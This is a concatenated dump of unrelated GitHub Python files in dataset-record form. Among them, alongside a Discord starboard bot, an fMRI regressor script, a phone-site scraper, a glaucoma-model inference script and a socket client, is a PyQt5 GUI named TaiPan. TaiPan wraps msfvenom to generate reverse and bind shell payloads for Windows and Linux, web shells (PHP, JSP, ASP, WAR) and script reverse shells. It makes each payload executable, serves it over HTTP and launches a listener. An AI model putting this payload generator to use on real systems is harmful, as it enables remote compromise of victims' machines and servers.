break\n\n @commands.Cog.listener()\n async def on_raw_reaction_remove(self, payload):\n if not payload.guild_id:\n return\n\n starboard_data = self.mongo_db.starboard.find_one({\"guild_id\": str(payload.guild_id)})\n if not starboard_data or str(payload.emoji) != starboard_data[\"emoji\"]:\n return\n\n channel = self.bot.get_channel(payload.channel_id)\n message = await channel.fetch_message(payload.message_id)\n\n emoji_found = False\n\n for reaction in message.reactions:\n if str(reaction.emoji) == starboard_data[\"emoji\"]:\n emoji_found = True\n if reaction.count < starboard_data[\"count\"]:\n starboard_msg_id = starboard_data.get(\"messages\", {}).get(str(message.id))\n if starboard_msg_id:\n starboard_channel = self.bot.get_channel(int(starboard_data[\"channel_id\"]))\n try:\n starboard_msg = await starboard_channel.fetch_message(starboard_msg_id)\n print(\"Starboard Message to delete:\", starboard_msg)\n await starboard_msg.delete()\n except Exception as e:\n print(\"Error:\", e)\n del starboard_data[\"messages\"][str(message.id)]\n self.mongo_db.starboard.update_one({\"guild_id\": str(payload.guild_id)},\n {\"$set\": starboard_data})\n break\n\n # Eğer ilgili emoji message.reactions içinde bulunamazsa, bu demek oluyor ki reaksiyon sayısı 0'dır.\n if not emoji_found:\n starboard_msg_id = starboard_data.get(\"messages\", {}).get(str(message.id))\n if starboard_msg_id:\n starboard_channel = self.bot.get_channel(int(starboard_data[\"channel_id\"]))\n try:\n starboard_msg = await starboard_channel.fetch_message(starboard_msg_id)\n print(\"Starboard Message to delete:\", starboard_msg)\n await starboard_msg.delete()\n except Exception as e:\n print(\"Error:\", e)\n del starboard_data[\"messages\"][str(message.id)]\n self.mongo_db.starboard.update_one({\"guild_id\": str(payload.guild_id)}, {\"$set\": starboard_data})\n\n @commands.hybrid_command(name=\"add_starboard\", description=\"Add starboard to your server.\")\n async def add_starboard(self, ctx, channel: discord.TextChannel, emoji: str, count: int):\n # Starboard ayarını ekleyin veya güncelleyin\n self.mongo_db.starboard.update_one(\n {\"guild_id\": str(ctx.guild.id)},\n {\n \"$set\": {\n \"channel_id\": str(channel.id),\n \"emoji\": emoji,\n \"count\": count\n }\n },\n upsert=True\n )\n\n await ctx.send(embed=create_embed(\n description=f\"Starboard set up successfully in {channel.mention} with {emoji} and {count} reactions!\",\n color=discord.Color.green()))\n\n @commands.hybrid_command(name=\"remove_starboard\", description=\"Remove starboard from your server.\")\n async def remove_starboard(self, ctx):\n self.mongo_db.starboard.delete_one({\"guild_id\": str(ctx.guild.id)})\n await ctx.send(embed=create_embed(description=\"Starboard system has been removed from this server.\",\n color=discord.Color.green()))\n\n\nasync def setup(bot):\n await bot.add_cog(Starboard(bot))","repo_name":"bergaman9/contro-bot","sub_path":"cogs/starboard.py","file_name":"starboard.py","file_ext":"py","file_size_in_byte":6065,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"33701268469","text":"#!/usr/bin/python3\r\n# -*- coding: utf-8 -*-\r\n\r\n# Created by Ethical Hacker Project\r\n\r\nimport os\r\nimport sys\r\n\r\nfrom PyQt5.QtGui import QFont,QIcon, QPixmap,QMovie\r\nfrom PyQt5.QtWidgets import QWidget,QApplication,QMessageBox,QLabel,QComboBox,QPushButton,QRadioButton,QLineEdit,QFileDialog,QCheckBox\r\nfrom PyQt5.QtCore import QRect,QCoreApplication,QMetaObject,Qt\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\nimport subprocess\r\n\r\n\r\n\r\n\r\n#payloads list\r\n#windows payloads\r\nwindows_payloads = [\r\n 'shell_reverse_tcp', \r\n 'shell_bind_tcp', \r\n]\r\n\r\n#linux payloads\r\nlinux_payloads = [\r\n 'shell_reverse_tcp', \r\n 'shell_bind_tcp', \r\n]\r\n\r\n#web payloads\r\nweb_reverse_payloads = [\r\n 'php',\r\n 'asp',\r\n 'jsp',\r\n 'war'\r\n]\r\n\r\n#script payloads\r\nscript_reverse_payloads = [\r\n 'bash',\r\n 'python',\r\n 'perl',\r\n 'nodejs',\r\n 'jar'\r\n]\r\n\r\n#global payloads settings\r\nglobal msfvenom_command\r\nglobal p_payload\r\nglobal p_arch\r\nglobal LHOST\r\nglobal LPORT\r\nglobal RHOST\r\nglobal RPORT\r\n\r\n\r\n\r\nclass Ui_Form(object):\r\n def setupUi(self, Form):\r\n Form.setObjectName(\"Form\")\r\n Form.resize(537, 428)\r\n font = QFont()\r\n font.setFamily(\"Old Antic Bold\") #font family\r\n font.setStrikeOut(False)\r\n Form.setFont(font)\r\n self.label = QLabel(Form)\r\n self.label.setGeometry(QRect(20, 100, 101, 31)) #x,y,widht,height\r\n font = QFont()\r\n font.setPointSize(13)\r\n font.setBold(False)\r\n font.setWeight(50)\r\n self.label.setFont(font)\r\n self.label.setTextFormat(Qt.AutoText)\r\n self.label.setObjectName(\"label\")\r\n self.label_3 = QLabel(Form)\r\n self.label_3.setGeometry(QRect(20, 150, 91, 21))\r\n font = QFont()\r\n font.setPointSize(13)\r\n font.setBold(False)\r\n font.setWeight(50)\r\n self.label_3.setFont(font)\r\n self.label_3.setObjectName(\"label_2\")\r\n self.label_2 = QLabel(Form)\r\n self.label_2.setGeometry(QRect(20, 190, 91, 20))\r\n font = QFont()\r\n font.setPointSize(13)\r\n self.label_2.setFont(font)\r\n self.label_2.setObjectName(\"label_3\")\r\n self.comboBox_platform = QComboBox(Form) #combobox --> dropdown menu\r\n self.comboBox_platform.setGeometry(QRect(130, 100, 181, 31))\r\n font = QFont()\r\n font.setStrikeOut(False)\r\n self.comboBox_platform.setFont(font)\r\n self.comboBox_platform.setMouseTracking(False)\r\n self.comboBox_platform.setAutoFillBackground(True)\r\n self.comboBox_platform.setObjectName(\"comboBox_platform\")\r\n self.comboBox_platform.addItem(\"\")\r\n self.comboBox_platform.addItem(\"\")\r\n self.comboBox_platform.addItem(\"\")\r\n self.comboBox_platform.addItem(\"\")\r\n self.pushButton = QPushButton(Form)\r\n self.pushButton.setGeometry(QRect(90, 400, 151, 41))\r\n self.pushButton.setObjectName(\"pushButton\")\r\n self.pushButton_2 = QPushButton(Form)\r\n self.pushButton_2.setGeometry(QRect(410, 400, 151, 41))\r\n self.pushButton_2.setObjectName(\"pushButton_2\")\r\n self.label_4 = QLabel(Form)\r\n self.label_4.setGeometry(QRect(150, 20, 250, 51))\r\n font = QFont()\r\n font.setFamily(\"Old Antic Bold\")\r\n font.setPointSize(27)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.label_4.setFont(font)\r\n self.label_4.setObjectName(\"label_4\")\r\n self.comboBox_payload = QComboBox(Form)\r\n self.comboBox_payload.setGeometry(QRect(130, 190, 271, 31))\r\n self.comboBox_payload.setObjectName(\"comboBox_payload\")\r\n self.radioButton_86 = QRadioButton(Form)\r\n self.radioButton_86.setGeometry(QRect(130, 150, 119, 25))\r\n self.radioButton_86.setObjectName(\"radioButton_86\") #architecture radio button\r\n self.radioButton_64 = QRadioButton(Form)\r\n self.radioButton_64.setGeometry(QRect(250, 150, 119, 25))\r\n self.radioButton_64.setChecked(True)\r\n self.radioButton_64.setObjectName(\"radioButton_64\")\r\n self.label_5 = QLabel(Form)\r\n self.label_5.setGeometry(QRect(20, 235, 91, 31))\r\n font = QFont()\r\n font.setPointSize(13)\r\n self.label_5.setFont(font)\r\n self.label_5.setObjectName(\"label_5\")\r\n self.label_6 = QLabel(Form)\r\n self.label_6.setGeometry(QRect(290, 280, 71, 21))\r\n self.label_6.setObjectName(\"label_6\")\r\n self.label_7 = QLabel(Form)\r\n self.label_7.setGeometry(QRect(290, 325, 71, 20))\r\n self.label_7.setObjectName(\"label_7\")\r\n self.label_8 = QLabel(Form)\r\n self.label_8.setGeometry(QRect(60, 280, 71, 20))\r\n self.label_8.setObjectName(\"label_8\")\r\n self.label_9 = QLabel(Form)\r\n self.label_9.setGeometry(QRect(60, 325, 71, 20))\r\n self.label_9.setObjectName(\"label_9\")\r\n self.lineEdit_lhost = QLineEdit(Form)\r\n self.lineEdit_lhost.setGeometry(QRect(130, 280, 131, 21))\r\n self.lineEdit_lhost.setObjectName(\"lineEdit_lhost\")\r\n self.lineEdit_lport = QLineEdit(Form)\r\n self.lineEdit_lport.setGeometry(QRect(130, 325, 131, 21))\r\n self.lineEdit_lport.setObjectName(\"lineEdit_lport\")\r\n self.lineEdit_rhost = QLineEdit(Form)\r\n self.lineEdit_rhost.setGeometry(QRect(360, 280, 141, 21))\r\n self.lineEdit_rhost.setObjectName(\"lineEdit_rhost\")\r\n self.lineEdit_rport = QLineEdit(Form)\r\n self.lineEdit_rport.setGeometry(QRect(360, 325, 141, 21))\r\n self.lineEdit_rport.setObjectName(\"lineEdit_rport\")\r\n self.pushButton_3 = QPushButton(Form)\r\n self.pushButton_3.setGeometry(QRect(250, 400, 151, 41))\r\n self.pushButton_3.setObjectName(\"pushButton_3\")\r\n\r\n #Fixed image on screen\r\n #self.label_10 = QLabel(Form)\r\n #self.label_10.setGeometry(QtCore.QRect(400, 25, 250, 250))\r\n #self.label_10.setText(\"\")\r\n #self.label_10.setPixmap(QtGui.QPixmap(\"logo2.png\"))\r\n #self.label_10.setScaledContents(True)\r\n\r\n #Animated GIF on screen\r\n self.label_10 = QtWidgets.QLabel(Form)\r\n self.label_10.setGeometry(QtCore.QRect(400, 25, 250, 250))\r\n self.label_10.setObjectName(\"label_10\")\r\n #self.retranslateUi(Form)\r\n \r\n self.retranslateUi(Form)\r\n self.comboBox_platform.currentIndexChanged['int'].connect(Form.setPlatform)\r\n self.pushButton_2.clicked.connect(Form.ExitTool)\r\n self.radioButton_86.clicked.connect(Form.setArch)\r\n self.radioButton_64.clicked.connect(Form.setArch)\r\n self.pushButton.clicked.connect(Form.GeneratePayload)\r\n self.pushButton_3.clicked.connect(Form.pythonServer)\r\n #QMetaObject.connectSlotsByName(Form) #commented out for animated gif\r\n QtCore.QMetaObject.connectSlotsByName(Form)\r\n\r\n def retranslateUi(self, Form):\r\n #translating labels to text\r\n _translate = QtCore.QCoreApplication.translate\r\n #_translate = QCoreApplication.translate #commented out for animated gif\r\n Form.setWindowTitle(_translate(\"Form\", \"Form\"))\r\n self.label.setText(_translate(\"Form\", \"OS\"))\r\n self.label_2.setText(_translate(\"Form\", \"Payload\"))\r\n self.label_3.setText(_translate(\"Form\", \"Arch\"))\r\n self.comboBox_platform.setItemText(0, _translate(\"Form\", \"Windows\"))\r\n self.comboBox_platform.setItemText(1, _translate(\"Form\", \"Linux\")) \r\n self.comboBox_platform.setItemText(2, _translate(\"Form\", \"Web_Reverse_Shell\"))\r\n self.comboBox_platform.setItemText(3, _translate(\"Form\", \"Script_Reverse_Shell\"))\r\n self.pushButton.setText(_translate(\"Form\", \"Generate\"))\r\n self.pushButton_2.setText(_translate(\"Form\", \"Exit\"))\r\n self.label_4.setText(_translate(\"Form\", \"TaiPan v1.0\"))\r\n self.radioButton_86.setText(_translate(\"Form\", \"x86\"))\r\n self.radioButton_64.setText(_translate(\"Form\", \"x64\"))\r\n self.label_5.setText(_translate(\"Form\", \"Parameters\"))\r\n self.label_6.setText(_translate(\"Form\", \"RHOST\"))\r\n self.label_7.setText(_translate(\"Form\", \"RPORT\"))\r\n self.label_8.setText(_translate(\"Form\", \"LHOST\"))\r\n self.label_9.setText(_translate(\"Form\", \"LPORT\"))\r\n self.pushButton_3.setText(_translate(\"Form\", \"Serve Payload\"))\r\n\r\nclass Mywindow(QWidget,Ui_Form):\r\n \r\n def __init__(self): \r\n super(Mywindow,self).__init__()\r\n self.setStyleSheet(\"background-color: #2B2D2F; color: white \") ##39ff14\r\n self.setFixedSize(640, 480) #fixed size for main window\r\n self.setupUi(self)\r\n self.comboBox_payload.addItems(windows_payloads)\r\n self.msfvenom_command = \"\"\r\n self.p_arch = self.setArch()\r\n self.p_payload = \"\"\r\n self.LHOST=\"\"\r\n self.LPORT=\"\"\r\n self.RHOST=\"\"\r\n self.RPORT=\"\"\r\n self.FILENAME=\"\"\r\n\r\n #Animation for GIF\r\n self.gif = QMovie('venom_face3.gif')\r\n self.label_10.setMovie(self.gif)\r\n self.gif.start()\r\n\r\n #Define slot function\r\n def setPlatform(self):\r\n if self.comboBox_platform.currentText()== \"Windows\":\r\n self.comboBox_payload.clear()\r\n self.comboBox_payload.addItems(windows_payloads)\r\n\r\n elif self.comboBox_platform.currentText()== \"Linux\":\r\n self.comboBox_payload.clear()\r\n self.comboBox_payload.addItems(linux_payloads)\r\n\r\n elif self.comboBox_platform.currentText()== \"Web_Reverse_Shell\":\r\n self.comboBox_payload.clear()\r\n self.comboBox_payload.addItems(web_reverse_payloads)\r\n\r\n elif self.comboBox_platform.currentText()== \"Script_Reverse_Shell\":\r\n self.comboBox_payload.clear()\r\n self.comboBox_payload.addItems(script_reverse_payloads)\r\n\r\n def setArch(self):\r\n if self.radioButton_64.isChecked():\r\n return \"x64\"\r\n elif self.radioButton_86.isChecked():\r\n return \"x86\"\r\n \r\n def ExitTool(self):\r\n QCoreApplication.instance().quit()\r\n\r\n def GeneratePayload(self):\r\n self.setPayloadSettings()\r\n\r\n try:\r\n #payload will be saved on the tmp folder\r\n file_name,ok=QFileDialog.getSaveFileName(self,'Save','/tmp')\r\n if ok:\r\n f=open(file_name,'w')\r\n \r\n except :\r\n pass\r\n self.msfvenom_command = self.msfvenom_command + \" > \" + file_name\r\n self.FILENAME = file_name\r\n subprocess.call(['chmod', '0777', file_name]) #automates file created into executable\r\n \r\n # debug infomation\r\n print(self.msfvenom_command)\r\n print(self.p_payload)\r\n print(self.LHOST,self.LPORT)\r\n print(self.RHOST,self.RPORT)\r\n\r\n QMessageBox.about(self, \"The Ethical Hacker Project\", \"Generating payload\")\r\n if os.system(self.msfvenom_command) == 0:\r\n QMessageBox.about(self, \"The Ethical Hacker Project\", \"Successfully generated payload!\")\r\n #os.system('gnome-terminal -- nc -lvp ' +self.lineEdit_lport.text() ) # --> Uncomment if you rather use nc listener\r\n dirpath = os.getcwd() # gets current working directory \r\n #opens new terminal with a python listener\r\n subprocess.call(['gnome-terminal', '-e', 'python3 '+ dirpath + '/listener.py '+ str(self.lineEdit_lport.text())])\r\n else:\r\n QMessageBox.about(self,\"The Ethical Hacker Project\", \"Failed to generate payload!\")\r\n\r\n #PythonServer port 80\r\n def pythonServer(self):\r\n os.system('gnome-terminal -- python -m SimpleHTTPServer 80')\r\n QMessageBox.about(self, \"URL TO PAYLOAD\",\"http://\"+self.lineEdit_lhost.text()+self.FILENAME)\r\n\r\n\r\n def setPayloadSettings(self):\r\n #Windows payload\r\n if self.comboBox_platform.currentText()== \"Windows\":\r\n if self.comboBox_payload.currentText() == \"messagebox\":\r\n self.p_payload = \"windows/\"+self.comboBox_payload.currentText()\r\n self.msfvenom_command = \"msfvenom\" + \" -p \"+self.p_payload+\" TEXT=\"+\"\\'hello, it is a test\\'\"+\" -f exe\"\r\n \r\n elif self.comboBox_payload.currentText() == \"shell_bind_tcp\":\r\n self.RHOST = self.lineEdit_rhost.text()\r\n self.RPORT = self.lineEdit_rport.text()\r\n if self.p_arch == 'x86':\r\n self.p_payload = \"windows/\"+self.comboBox_payload.currentText()\r\n else:\r\n self.p_payload = \"windows/\"+self.p_arch+\"/\"+self.comboBox_payload.currentText()\r\n self.msfvenom_command = \"msfvenom\" + \" -p \"+self.p_payload+\" RHOST=\"+ self.lineEdit_lhost.text()+ \" RPORT=\"+ self.lineEdit_lport.text()+\" -f exe\"\r\n else:\r\n self.LHOST = self.lineEdit_lhost.text()\r\n self.LPORT = self.lineEdit_lport.text()\r\n if self.p_arch == 'x86':\r\n self.p_payload = \"windows/\"+self.comboBox_payload.currentText()\r\n else:\r\n self.p_payload = \"windows/\"+self.p_arch+\"/\"+self.comboBox_payload.currentText()\r\n self.msfvenom_command = \"msfvenom\" + \" -p \"+self.p_payload+\" LHOST=\"+ self.lineEdit_lhost.text()+ \" LPORT=\"+ self.lineEdit_lport.text()+\" -f exe\"\r\n\r\n #Linux payload\r\n elif self.comboBox_platform.currentText()== \"Linux\":\r\n if self.comboBox_payload.currentText() == \"shell_bind_tcp\":\r\n self.RHOST = self.lineEdit_rhost.text()\r\n self.RPORT = self.lineEdit_rport.text()\r\n self.p_payload = \"linux/\"+self.p_arch+\"/\"+self.comboBox_payload.currentText()\r\n self.msfvenom_command = \"msfvenom\" + \" -p \"+self.p_payload+\" RHOST=\"+ self.lineEdit_lhost.text()+ \" RPORT=\"+ self.lineEdit_lport.text()+\" -f elf\"\r\n else:\r\n self.LHOST = self.lineEdit_lhost.text()\r\n self.LPORT = self.lineEdit_lport.text()\r\n self.p_payload = \"linux/\"+self.p_arch+\"/\"+self.comboBox_payload.currentText()\r\n self.msfvenom_command = \"msfvenom\" + \" -p \"+self.p_payload+\" LHOST=\"+ self.lineEdit_lhost.text()+ \" LPORT=\"+ self.lineEdit_lport.text()+\" -f elf\"\r\n\r\n #Web Reverse payload\r\n elif self.comboBox_platform.currentText()== \"Web_Reverse_Shell\":\r\n if self.comboBox_payload.currentText() == \"php\":\r\n self.LHOST = self.lineEdit_lhost.text()\r\n self.LPORT = self.lineEdit_lport.text()\r\n self.p_payload = \"php/reverse_php\"\r\n self.msfvenom_command = \"msfvenom\" + \" -p \"+self.p_payload+\" LHOST=\"+ self.lineEdit_lhost.text()+ \" LPORT=\"+ self.lineEdit_lport.text()+\" -f raw\"\r\n\r\n elif self.comboBox_payload.currentText() == \"jsp\":\r\n self.LHOST = self.lineEdit_lhost.text()\r\n self.LPORT = self.lineEdit_lport.text()\r\n self.p_payload = \"java/jsp_shell_reverse_tcp\"\r\n self.msfvenom_command = \"msfvenom\" + \" -p \"+self.p_payload+\" LHOST=\"+ self.lineEdit_lhost.text()+ \" LPORT=\"+ self.lineEdit_lport.text()+\" -f raw\"\r\n\r\n elif self.comboBox_payload.currentText() == \"asp\":\r\n self.LHOST = self.lineEdit_lhost.text()\r\n self.LPORT = self.lineEdit_lport.text()\r\n self.p_payload = \"windows/meterpreter/reverse_tcp\"\r\n self.msfvenom_command = \"msfvenom\" + \" -p \"+self.p_payload+\" LHOST=\"+ self.lineEdit_lhost.text()+ \" LPORT=\"+ self.lineEdit_lport.text()+\" -f asp\"\r\n\r\n elif self.comboBox_payload.currentText() == \"war\":\r\n self.LHOST = self.lineEdit_lhost.text()\r\n self.LPORT = self.lineEdit_lport.text()\r\n self.p_payload = \"java/jsp_shell_reverse_tcp\"\r\n self.msfvenom_command = \"msfvenom\" + \" -p \"+self.p_payload+\" LHOST=\"+ self.lineEdit_lhost.text()+ \" LPORT=\"+ self.lineEdit_lport.text()+\" -f war\"\r\n\r\n #Script Reverse payload\r\n elif self.comboBox_platform.currentText()== \"Script_Reverse_Shell\":\r\n if self.comboBox_payload.currentText() == \"bash\":\r\n self.LHOST = self.lineEdit_lhost.text()\r\n self.LPORT = self.lineEdit_lport.text()\r\n self.p_payload = \"cmd/unix/reverse_bash\"\r\n self.msfvenom_command = \"msfvenom\" + \" -p \"+self.p_payload+\" LHOST=\"+ self.lineEdit_lhost.text()+ \" LPORT=\"+ self.lineEdit_lport.text()+\" -f raw\"\r\n elif self.comboBox_payload.currentText() == \"python\":\r\n self.LHOST = self.lineEdit_lhost.text()\r\n self.LPORT = self.lineEdit_lport.text()\r\n self.p_payload = \"python/shell_reverse_tcp\"\r\n self.msfvenom_command = \"msfvenom\"+\" -a python\"+\" -p \"+self.p_payload+\" LHOST=\"+ self.lineEdit_lhost.text()+ \" LPORT=\"+ self.lineEdit_lport.text()+\" -f raw\"\r\n elif self.comboBox_payload.currentText() == \"perl\":\r\n self.LHOST = self.lineEdit_lhost.text()\r\n self.LPORT = self.lineEdit_lport.text()\r\n self.p_payload = \"cmd/unix/reverse_perl\"\r\n self.msfvenom_command = \"msfvenom\"+\" -p \"+self.p_payload+\" LHOST=\"+ self.lineEdit_lhost.text()+ \" LPORT=\"+ self.lineEdit_lport.text()+\" -f raw\"\r\n elif self.comboBox_payload.currentText() == \"nodejs\":\r\n self.LHOST = self.lineEdit_lhost.text()\r\n self.LPORT = self.lineEdit_lport.text()\r\n self.p_payload = \"cmd/unix/reverse_nodejs\"\r\n self.msfvenom_command = \"msfvenom\"+\" -p \"+self.p_payload+\" LHOST=\"+ self.lineEdit_lhost.text()+ \" LPORT=\"+ self.lineEdit_lport.text()+\" -f raw\"\r\n elif self.comboBox_payload.currentText() == \"jar\":\r\n self.LHOST = self.lineEdit_lhost.text()\r\n self.LPORT = self.lineEdit_lport.text()\r\n self.p_payload = \"java/shell_reverse_tcp\"\r\n self.msfvenom_command = \"msfvenom\"+\" -p \"+self.p_payload+\" LHOST=\"+ self.lineEdit_lhost.text()+ \" LPORT=\"+ self.lineEdit_lport.text()+\" -f jar\"\r\ndef main():\r\n app = QApplication(sys.argv)\r\n window = Mywindow()\r\n window.setWindowTitle(\"By The Ethical Hacker Project\")\r\n window.setWindowIcon(QIcon('logo.jpg'))\r\n window.show()\r\n sys.exit(app.exec_())\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n \r\n\r\n","repo_name":"ethicalhackerproject/TaiPan","sub_path":"TaiPan_v1.0.py","file_name":"TaiPan_v1.0.py","file_ext":"py","file_size_in_byte":18344,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"61"} +{"seq_id":"2339317050","text":"import os\nfrom pathlib import Path\n\nimport pandas as pd\nimport numpy as np\n\nhome = str(Path.home())\np = Path(home + \"/projects/critchley_depersonalisation\")\nparticipants = pd.read_csv(p / \"code\" / \"participants.tsv\", sep=\"\\t\", index_col=0)\nregressors = participants.iloc[:, :2]\nregressors[\"mean_fd\"] = np.nan\n\nfor idx, row in regressors.iterrows():\n subject = idx\n print(subject)\n path = list(\n p.glob(\n f\"data/derivatives/fmriprep-1.5.1rc2/{subject}/func/{subject}_task-heartbeat_run-1_desc-confounds_regressors.tsv\"\n )\n )\n confounds_path = path[0]\n confounds = pd.read_csv(confounds_path, sep=\"\\t\")\n mean_fd = confounds.loc[5:, \"framewise_displacement\"].mean()\n regressors.loc[idx, \"mean_fd\"] = mean_fd\n\nstats = pd.read_csv(p / \"results\" / \"full_sample_stats.tsv\", sep=\"\\t\", index_col=0)\ncds = stats.CDS_State\n\n# concatenate cds and the rest\nregressors = pd.concat([regressors, cds], axis=1, join=\"inner\")\n\n# create z test var\nfor c in [\"control\", \"patient\"]:\n regressors[c] = 0\n regressors[c][regressors.group == c] = 1\nregressors.group = 1\n\n# z score\nz_convert = [\"age\", \"mean_fd\", \"CDS_State\"]\nregressors[z_convert] -= regressors[z_convert].mean()\nregressors[z_convert] /= regressors[z_convert].std(ddof=0)\n\n# sort by group\nregressors = regressors.sort_index()\nregressors = regressors.sort_values(by=[\"patient\"])\n\n# save file\nout_file = p / \"scripts\" / \"group_design\" / \"mri_regressors.tsv\"\nregressors.to_csv(out_file, sep=\"\\t\", float_format=\"%.5f\")\n","repo_name":"htwangtw/depersonalisation","sub_path":"scripts/src/fsl_group_regressors.py","file_name":"fsl_group_regressors.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25347183014","text":"'''\nTHIS PROGRAM OPENS THE GSMARENA PAGE WHICH ENLISTS ALL OF THE MAKERS OF MOBILE PHONES AND DEVICES.\n\nTHE SCRAPER FIRST SAVES ALL OF THE INDIVIDUAL LINKS. (101 IN NUMBER)\n\nTHE SCRAPER THEN STORES THESE URLs IN A TEXT FILE \"PHONE_URL.TXT\".\n\n'''\n\n\nfrom bs4 import BeautifulSoup\nimport requests\n\nurl = 'http://www.gsmarena.com/makers.php3'\nr = requests.get(url)\ndata = r.text\nsoup = BeautifulSoup(data)\n\nB = soup.find_all(\"table\")\nmanu_links = []\nlinks = B[0].find_all('a')\nfor l in links[::2]:\n manu_links.append(l['href'])\n\nI = len(manu_links)\n\nfor i in range(I):\n ml = manu_links[i]\n url = 'http://www.gsmarena.com/'+ml\n r = requests.get(url)\n data = r.text\n soup = BeautifulSoup(data)\n phonetabs = soup.find_all(\"div\",{\"class\":\"makers\"})\n phone_links=[]\n for p in phonetabs:\n link = p.find_all('a')\n for l in link:\n phone_links.append(l['href'])\n f = open(\"phones_urls.txt\",\"a\")\n for p in phone_links:\n f.write(p+\",\")\n f.close()\n","repo_name":"maximus009/Scraper","sub_path":"phone_links_retrieve.py","file_name":"phone_links_retrieve.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"30726319464","text":"import os\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import cohen_kappa_score\n\nimport paddle\nimport paddle.nn as nn\nimport paddle.nn.functional as F\nfrom paddle.vision.models import resnet34\nfrom model import Model\nimport paddle.vision.transforms as trans\nfrom dataset import GAMMA_sub1_dataset\nimport warnings\nwarnings.filterwarnings('ignore')\n\nbatchsize = 1 # 4 patients per iter, i.e, 20 steps / epoch\noct_img_size = [512, 512]\nimage_size = 256\niters = 1000 # For demonstration purposes only, far from reaching convergence\nval_ratio = 0.2 # 80 / 20\ntrainset_root = \"\"\ntest_root = \"E:\\\\multi-modal-resnet\\\\multi-modality_images\"\nnum_workers = 0\ninit_lr = 1e-4\noptimizer_type = \"adam\"\n\nbest_model_path = \"./best_model_0.8649/model.pdparams\"\nmodel = Model()\npara_state_dict = paddle.load(best_model_path)\nmodel.set_state_dict(para_state_dict)\nmodel.eval()\n\n\n\nimg_test_transforms = trans.Compose([\n # trans.CropCenterSquare(),\n trans.Resize((image_size, image_size))\n])\n\noct_test_transforms = trans.Compose([\n # trans.CenterCrop([256] + oct_img_size)\n])\n\ntest_dataset = GAMMA_sub1_dataset(dataset_root=test_root,\n img_transforms=img_test_transforms,\n oct_transforms=None,\n mode='test')\n\ncache = []\nfor fundus_img, oct_img, idx in test_dataset:\n fundus_img = fundus_img[np.newaxis, ...]\n oct_img = oct_img[np.newaxis, ...]\n\n fundus_img = paddle.to_tensor((fundus_img / 255.).astype(\"float32\"))\n oct_img = paddle.to_tensor((oct_img / 255.).astype(\"float32\"))\n\n logits = model(fundus_img, oct_img)\n cache.append([idx, logits.numpy().argmax(1)])\n print(idx)\n\nsubmission_result = pd.DataFrame(cache, columns=['data', 'dense_pred'])\nsubmission_result['non'] = submission_result['dense_pred'].apply(lambda x: int(x[0] == 0))\nsubmission_result['early'] = submission_result['dense_pred'].apply(lambda x: int(x[0] == 1))\nsubmission_result['mid_advanced'] = submission_result['dense_pred'].apply(lambda x: int(x[0] == 2))\nsubmission_result[['data', 'non', 'early', 'mid_advanced']].to_csv(\"./submission_sub1.csv\", index=False)\n\n","repo_name":"a2824256/multi-modal-resnet","sub_path":"infer.py","file_name":"infer.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"} +{"seq_id":"16198562886","text":"import socket\nimport threading\nimport sys\nimport os\n\n#Wait for incoming data from server\n#.decode is used to turn the message in bytes to a string\ndef receive(socket, signal):\n while signal:\n try:\n data = socket.recv(32)\n print(str(data.decode(\"utf-8\")))\n except:\n print(\"You have been disconnected from the server\")\n signal = False\n break\n#------------------------------------------------------------------\ndef helping():\n print(\"-----------------------------------\\n\")\n print(\"To receive files from the server:\\n\")\n print(\"start with command (recv)\")\n print(\"-----------------------------------\\n\")\n print(\"To list all the files in the server:\\n\")\n print(\"use the command (list)\")\n print(\"-----------------------------------\\n\")\n#------------------------------------------------------------------\n\n#Get host and port\nhost = input(\"Host: \")\nport = int(input(\"Port: \"))\n\n#Attempt connection to server\ntry:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect((host, port))\nexcept:\n print(\"Could not make a connection to the server\")\n input(\"Press enter to quit\")\n sys.exit(0)\n\n#Create new thread to wait for data\nreceiveThread = threading.Thread(target = receive, args = (sock, True))\nreceiveThread.start()\n\n#Send data to server\n#str.encode is used to turn the string message into bytes so it can be sent across the network\nwhile True:\n def find_folder():\n folder = input(\"Now choose the folder>\")\n sock.sendall(str.encode(folder))\n file = open(\"/home/uniquare/Desktop/project/files_received/\"+folder, mode=\"w\", encoding=\"utf-8\") \n RecvData = sock.recv(1024)\n file.write(str(RecvData.decode(\"utf-8\")))\n file.close()\n\n#Define the input provided by the user\n cmd = input(\"input_command>\")\n \n if cmd == \"recv\":\n specify = input(\"Choose a file after listing using the command (list)>\")\n if specify == \"list\":\n print(os.listdir(\"/home/uniquare/Desktop/project/files_to_send\"))\n find_folder()\n\n choice = input(\"do you want to recv another file? (y/n)\")\n if choice == \"y\":\n find_folder()\n \n else:\n print(\"command not recognized\")\n elif cmd == \"list\":\n print(os.listdir(\"/home/uniquare/Desktop/project/files_to_send\"))\n elif cmd == \"quit\":\n sys.exit(0)\n#If the user did not use our command line before she/he can type \"help\" that provide some description\n elif cmd == \"help\":\n helping()\n else:\n print(\"command not recognized\")","repo_name":"Sayed-Code/IoT_Project","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29091988444","text":"# +\n'''\nDefines the methods used for classification using the tsfresh\nextracted features as input (softmax and base neural network).\n'''\n\nimport sklearn\nfrom sklearn.preprocessing import LabelEncoder, Normalizer, OneHotEncoder, StandardScaler\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nimport pickle\nimport pandas as pd\n# -\n\nfrom tensorflow import keras\nimport tensorflow as tf\nfrom tensorflow.keras import layers, models, regularizers, metrics, optimizers\nfrom obtain_metrics import get_metrics, plot_confusion_matrix\n\ndef load_raw_data(x_data_file, y_data_file):\n 